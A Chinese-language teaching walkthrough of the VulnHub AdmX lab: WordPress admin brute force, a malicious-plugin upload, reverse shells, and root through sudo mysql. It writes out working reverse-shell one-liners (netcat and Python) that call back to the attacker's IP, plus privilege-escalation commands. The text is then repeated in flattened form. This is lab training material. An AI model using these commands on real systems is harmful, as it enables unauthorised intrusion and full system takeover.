VulnHub AdmX 靶场渗透测试教学文档

靶场概述

AdmX 是一个 VulnHub 提供的渗透测试靶场，目标是通过各种渗透技术获取 2 个 flag 并最终取得 root 权限。

环境准备

靶机下载：
- 下载地址：https://download.vulnhub.com/admx/AdmX_new.7z
- 文件格式：.ova 压缩文件
- 导入方式：使用 VMware 直接导入
网络设置：
- 推荐使用 NAT 模式（桥接模式也可，但需与攻击机保持一致）
- 攻击机推荐使用 Kali Linux

信息收集

IP 发现：
- 扫描 NAT 网段发现靶机 IP
- 示例：攻击机 IP 为 192.168.52.128，靶机 IP 为 192.168.52.131
端口扫描：
```
nmap -sT -p 0-65535 -A 192.168.52.131
```
- 发现开放 80 端口
- Web 服务器：Apache httpd 2.4.21

Web 应用渗透

目录扫描：
- 发现敏感路径：
  - /wordpress/wp-login.php
  - /wordpress
资源加载问题：
- 页面请求了固定 IP (192.168.159.145) 的资源
- 解决方案（Burp Suite）：
  1. Proxy → Options → Match and Replace
  2. 删除所有现有规则
  3. 添加新规则：将响应头和响应体中的旧 IP 替换为当前靶机 IP
WordPress 后台登录：
- 使用 WPScan 进行漏洞扫描：
```
wpscan --update
wpscan --url http://192.168.52.131/wordpress
```
- 未发现可直接获取 shell 的漏洞
暴力破解：
- 发现默认账号：admin
- 使用 Burp Suite Intruder 进行密码爆破
- 成功获取密码

获取初始 Shell

上传 Webshell 尝试：
- 方法 1：通过 Media 上传
  - 上传 PHP 文件被阻止（前后端验证）
- 方法 2：编辑插件 PHP 文件
  - 插入代码但无法访问
- 方法 3：修改主题 PHP 文件（Twenty Twenty-One 主题）
  - 修改失败
- 方法 4：上传恶意插件
  - 编写包含恶意代码的插件（需包含插件头部描述信息）
  - 压缩为 ZIP 格式上传
  - 激活插件执行命令

反弹 Shell：

初始尝试（失败）：
```
nc -e /bin/bash 192.168.52.128 4444
```

成功方法 1：NC 串联

nc 192.168.52.128 4444 | /bin/bash | nc 192.168.52.128 5555

成功方法 2：Python 反弹

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.52.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Shell 升级：

# 挂起当前 shell
CTRL+Z
stty raw -echo
fg
# 设置环境
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset

权限提升

获取第一个 flag：
- 路径：/home/wpadmin/local.txt
- 当前用户：www-data（无权限）
提权到 wpadmin：
- 方法 1：通过 WordPress 配置文件中的数据库凭据
  - 找到 wp-config.php 中的数据库账号密码
  - 连接 MySQL：
```
mysql -u username -p
```
  - 使用 MySQL 的 system 函数执行命令：
```
system whoami
```
- 方法 2：直接 su 到 wpadmin（使用 WordPress 后台密码）
提权到 root：
- 检查 sudo 权限：
```
sudo -l
```
- 发现可通过 sudo 执行 mysql 命令
- 利用 MySQL 的 system 函数获取 root shell：
```
sudo mysql
system /bin/bash
```

关键知识点总结

WordPress 渗透技巧：
- 资源路径固定 IP 问题的解决方法
- 多种获取 shell 的方式（插件上传、主题修改等）
- WPScan 的使用
Shell 获取与升级：
- 多种反弹 shell 方法
- 交互式 shell 的获取与升级
权限提升方法：
- 数据库凭据利用
- MySQL 的 system 函数提权
- sudo 权限滥用
其他尝试但未成功的提权方法：
- SUID 提权（检查 / -perm -4000）
- 内核提权（内核版本 5.4.0）

注意事项

网络模式需保持一致（NAT 或桥接）
资源加载问题需通过 Burp 修改响应解决
多种 shell 获取方法需根据环境选择
提权路径有多种选择，需灵活尝试

VulnHub AdmX 靶场渗透测试教学文档靶场概述 AdmX 是一个 VulnHub 提供的渗透测试靶场，目标是通过各种渗透技术获取 2 个 flag 并最终取得 root 权限。环境准备靶机下载：下载地址：https://download.vulnhub.com/admx/AdmX_ new.7z 文件格式：.ova 压缩文件导入方式：使用 VMware 直接导入网络设置：推荐使用 NAT 模式（桥接模式也可，但需与攻击机保持一致）攻击机推荐使用 Kali Linux 信息收集 IP 发现：扫描 NAT 网段发现靶机 IP 示例：攻击机 IP 为 192.168.52.128，靶机 IP 为 192.168.52.131 端口扫描：发现开放 80 端口 Web 服务器：Apache httpd 2.4.21 Web 应用渗透目录扫描：发现敏感路径： /wordpress/wp-login.php /wordpress 资源加载问题：页面请求了固定 IP (192.168.159.145) 的资源解决方案（Burp Suite）： Proxy → Options → Match and Replace 删除所有现有规则添加新规则：将响应头和响应体中的旧 IP 替换为当前靶机 IP WordPress 后台登录：使用 WPScan 进行漏洞扫描：未发现可直接获取 shell 的漏洞暴力破解：发现默认账号：admin 使用 Burp Suite Intruder 进行密码爆破成功获取密码获取初始 Shell 上传 Webshell 尝试：方法 1：通过 Media 上传上传 PHP 文件被阻止（前后端验证）方法 2：编辑插件 PHP 文件插入代码但无法访问方法 3：修改主题 PHP 文件（Twenty Twenty-One 主题）修改失败方法 4：上传恶意插件编写包含恶意代码的插件（需包含插件头部描述信息）压缩为 ZIP 格式上传激活插件执行命令反弹 Shell ：初始尝试（失败）：成功方法 1：NC 串联成功方法 2：Python 反弹 Shell 升级：权限提升获取第一个 flag ：路径：/home/wpadmin/local.txt 当前用户：www-data（无权限）提权到 wpadmin ：方法 1：通过 WordPress 配置文件中的数据库凭据找到 wp-config.php 中的数据库账号密码连接 MySQL：使用 MySQL 的 system 函数执行命令：方法 2：直接 su 到 wpadmin（使用 WordPress 后台密码）提权到 root ：检查 sudo 权限：发现可通过 sudo 执行 mysql 命令利用 MySQL 的 system 函数获取 root shell：关键知识点总结 WordPress 渗透技巧：资源路径固定 IP 问题的解决方法多种获取 shell 的方式（插件上传、主题修改等） WPScan 的使用 Shell 获取与升级：多种反弹 shell 方法交互式 shell 的获取与升级权限提升方法：数据库凭据利用 MySQL 的 system 函数提权 sudo 权限滥用其他尝试但未成功的提权方法： SUID 提权（检查 / -perm -4000 ）内核提权（内核版本 5.4.0）注意事项网络模式需保持一致（NAT 或桥接）资源加载问题需通过 Burp 修改响应解决多种 shell 获取方法需根据环境选择提权路径有多种选择，需灵活尝试